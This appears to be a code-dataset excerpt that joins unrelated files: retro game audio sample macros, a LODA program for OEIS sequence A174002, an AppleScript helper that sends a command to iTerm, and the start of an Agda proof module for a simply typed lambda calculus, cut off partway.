AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_LONG_WAIT(57) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(5,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_WAIT(6) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(5,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) SAMPLE_END .) music_adventure_sample_108: .( AUDIO_NOISE_LONG_WAIT(17) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) SAMPLE_END .) music_adventure_sample_109: .( AUDIO_NOISE_WAIT(6) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(5,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(4) SAMPLE_END .) music_adventure_sample_110: .( AUDIO_PULSE_META_NOTE_DUT_VOL(15,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(15,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(15,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) SAMPLE_END .) music_adventure_sample_111: .( AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_LONG_WAIT(47) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) SAMPLE_END .) music_adventure_sample_112: .( AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_LONG_WAIT(60) SAMPLE_END .) music_adventure_sample_113: .( AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_LONG_WAIT(57) AUDIO_NOISE_PITCH_SLIDE_UP(0) SAMPLE_END .) music_adventure_sample_114: .( AUDIO_PULSE_META_NOTE_DUT_VOL(41,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(13,4) AUDIO_PULSE_META_NOTE_DUT_VOL(43,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(13,4) AUDIO_PULSE_META_NOTE_DUT_VOL(44,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(7) LONG_WAIT(12) SAMPLE_END .) music_adventure_sample_115: .( AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(23,4) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(33,4) SAMPLE_END .) music_adventure_sample_116: .( AUDIO_PULSE_META_NOTE_DUT_VOL(43,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(33,4) AUDIO_PULSE_META_NOTE_DUT_VOL(39,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(23,4) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) SAMPLE_END .) music_adventure_sample_117: .( AUDIO_PULSE_META_NOTE_DUT_VOL(51,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(22,4) AUDIO_PULSE_META_NOTE_DUT_VOL(53,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(3) AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(13,4) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) SAMPLE_END .) music_adventure_sample_118: .( AUDIO_PULSE_META_NOTE_DUT_VOL(43,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(13,4) AUDIO_PULSE_META_NOTE_DUT_VOL(44,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(13,4) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_NOTE_DUT_VOL(43,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(13,4) AUDIO_PULSE_META_NOTE_VOL_DSLIDE(39,1,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) SAMPLE_END .) music_adventure_sample_119: .( AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,51) AUDIO_PULSE_META_NOTE_DUT_VOL(39,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,51) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,53) AUDIO_PULSE_META_NOTE_DUT_VOL(41,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,53) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,48) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(7) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,48) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_HIGH(1) WAIT(2) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,48) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_HIGH(1) WAIT(2) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(3) SAMPLE_END .) music_adventure_sample_120: .( AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,2,15) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,51) AUDIO_PULSE_META_NOTE_DUT_VOL(39,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,51) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,53) AUDIO_PULSE_META_NOTE_DUT_VOL(41,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,53) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,48) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(7) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,48) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(7) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,48) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,48) SAMPLE_END .) music_adventure_sample_121: .( AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,2,15) SAMPLE_END .) music_adventure_sample_122: .( CHAN_DUTY(2) PLAY_TIMED_NOTE(0,46) AUDIO_PULSE_META_NOTE_DUT_VOL(34,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,46) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,48) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,51) AUDIO_PULSE_META_NOTE_DUT_VOL(39,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,51) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,46) AUDIO_PULSE_META_NOTE_DUT_VOL(34,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,46) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(7) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,46) AUDIO_PULSE_META_NOTE_DUT_VOL(34,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,46) CHAN_VOLUME_HIGH(1) WAIT(2) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,46) AUDIO_PULSE_META_NOTE_DUT_VOL(34,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,46) CHAN_VOLUME_HIGH(1) WAIT(2) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(3) SAMPLE_END .) music_adventure_sample_123: .( CHAN_DUTY(2) PLAY_TIMED_NOTE(0,44) AUDIO_PULSE_META_NOTE_DUT_VOL(32,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,44) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,46) AUDIO_PULSE_META_NOTE_DUT_VOL(34,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,46) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,48) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(7) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,43) AUDIO_PULSE_META_NOTE_DUT_VOL(31,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,43) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,44) AUDIO_PULSE_META_NOTE_DUT_VOL(32,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,44) CHAN_VOLUME_HIGH(1) WAIT(2) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(3) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,46) AUDIO_PULSE_META_NOTE_DUT_VOL(34,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,46) CHAN_VOLUME_HIGH(1) WAIT(2) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(5) SAMPLE_END .) music_adventure_sample_124: .( AUDIO_PULSE_META_NOTE_DUT_VOL(12,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(12,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(12,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_NOTE_DUT_VOL(15,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) SAMPLE_END .) music_adventure_sample_125: .( CHAN_VOLUME_LOW(4) WAIT(2) SAMPLE_END .) music_adventure_sample_126: .( CHAN_VOLUME_LOW(4) WAIT(1) SAMPLE_END .) music_adventure_sample_127: .( CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(17,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(17,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) SAMPLE_END .) music_adventure_sample_128: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(17,1,2,11,0) SAMPLE_END .) music_adventure_sample_129: .( AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) SAMPLE_END .)

programs/oeis/174/A174002.asm

karttu/loda

1

169717

; A174002: a(n) = n*binomial(n+4, 4). ; 0,5,30,105,280,630,1260,2310,3960,6435,10010,15015,21840,30940,42840,58140,77520,101745,131670,168245,212520,265650,328900,403650,491400,593775,712530,849555,1006880,1186680,1391280,1623160,1884960,2179485 add $0,4 mov $1,$0 bin $1,5 mul $1,5

apple-scripts/iTermLegacy/iTerm-legacy-current-window.applescript

desynced/legendary-octo-broccoli

0

4069

--for testing uncomment the "on run" block --on run -- set argsCmd to "ps aux | grep [s]sh" -- scriptRun(argsCmd) --end run on scriptRun(argsCmd) set withCmd to (argsCmd) CommandRun(withCmd) end scriptRun on CommandRun(withCmd) tell application "iTerm" if it is running then tell the current terminal tell the current session reopen activate write text withCmd end tell end tell else tell the current terminal tell the current session write text withCmd activate end tell end tell end if end tell end CommandRun

src/STLC/Coquand/Soundness.agda

mietek/coquand-kovacs

0

6408

<filename>src/STLC/Coquand/Soundness.agda module STLC.Coquand.Soundness where open import STLC.Coquand.Completeness public -------------------------------------------------------------------------------- -- Un⟦_⟧ postulate ⟦_⟧Un : ∀ {Γ Ξ A} → {ρ : Γ ⊩⋆ Ξ} → (M : Ξ ⊢ A) → Un⋆ ρ → Un (⟦ M ⟧ ρ) -- 𝒰⋆⟦_⟧ₛ postulate ⟦_⟧Un⋆ : ∀ {Γ Ξ Φ} → {ρ : Γ ⊩⋆ Ξ} → (σ : Ξ ⊢⋆ Φ) → Un⋆ ρ → Un⋆ (⟦ σ ⟧⋆ ρ) postulate ⟦_⟧Eq : ∀ {Γ Ξ A} → {ρ₁ ρ₂ : Γ ⊩⋆ Ξ} → (M : Ξ ⊢ A) → Eq⋆ ρ₁ ρ₂ → Un⋆ ρ₁ → Un⋆ ρ₂ → Eq (⟦ M ⟧ ρ₁) (⟦ M ⟧ ρ₂) -- Eq⋆⟦_⟧ₛ postulate ⟦_⟧Eq⋆ : ∀ {Γ Ξ Φ} → {ρ₁ ρ₂ : Γ ⊩⋆ Ξ} → (σ : Ξ ⊢⋆ Φ) → Eq⋆ ρ₁ ρ₂ → Un⋆ ρ₁ → Un⋆ ρ₂ → Eq⋆ (⟦ σ ⟧⋆ ρ₁) (⟦ σ ⟧⋆ ρ₂) -------------------------------------------------------------------------------- -- ⟦_⟧⬗Eq = symEq ∘ ↑⟨_⟩Eq⟦_⟧ ⟦_⟧⬗Eq : ∀ {Γ Γ′ Ξ A} → {ρ : Γ ⊩⋆ Ξ} → (M : Ξ ⊢ A) (η : Γ′ ∋⋆ Γ) → Un⋆ ρ → Eq (⟦ M ⟧ (η ⬗ ρ)) (acc η (⟦ M ⟧ ρ)) ⟦_⟧⬗Eq (𝓋 i) η υ = get⬗Eq η i υ ⟦_⟧⬗Eq (ƛ M) η υ = eq⊃ (λ η′ u → ⟦ M ⟧Eq (comp⬗◇Eq⋆ η′ η υ , reflEq u) (cong⬗Un⋆ η′ (cong⬗Un⋆ η υ) , u) (cong⬗Un⋆ (η′ 